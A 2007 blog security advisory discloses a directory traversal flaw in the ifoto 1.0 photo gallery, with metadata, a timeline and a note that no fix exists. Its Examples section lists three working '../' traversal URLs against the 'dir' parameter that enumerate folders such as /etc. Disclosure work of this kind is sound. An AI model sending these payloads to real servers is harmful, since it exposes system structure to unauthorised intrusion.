ifoto traversal folder enumeration

Wednesday, July 25, 2007
#################################################
ifoto traversal folder enumeration
Vendor url:http://ifoto.ireans.com/
Advisore:http://lostmon.blogspot.com/2007/07/
ifoto-traversal-folder-enumeration.html
vendor notify:no exploit include:yes
Secunia:SA26186
BID:25065
SecWatch: SWID1018593
#################################################


ifoto contains a flaw that allows a remote traversal
arbitrary folder enumeration.This flaw exists because the
application does not validate 'dir' variable upon submission
to 'index.php' scripts.This could allow a remote users to
create a specially crafted URL that would execute '../'
directory traversal characters to view folder
structure on the target system with the privileges
of the target web service.



################
versions
################

ifoto 1.0


################
Solution:
################

No solution was available at this time !!!

################
TimeLine
################

Discovered: 18-07-2007
vendor notify:---
vendor response:---
disclosure:25-07-2007


#####################
Examples
#####################


http://[victims]/ifoto/?dir=..%2F..%2F..%2F..%2F..%2F..%2Fetc
http://[victims]/ifoto/?dir=../../../../../../etc
http://[victims]/ifoto/index.php?dir=../../../../../../


################# €nd ############################


--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...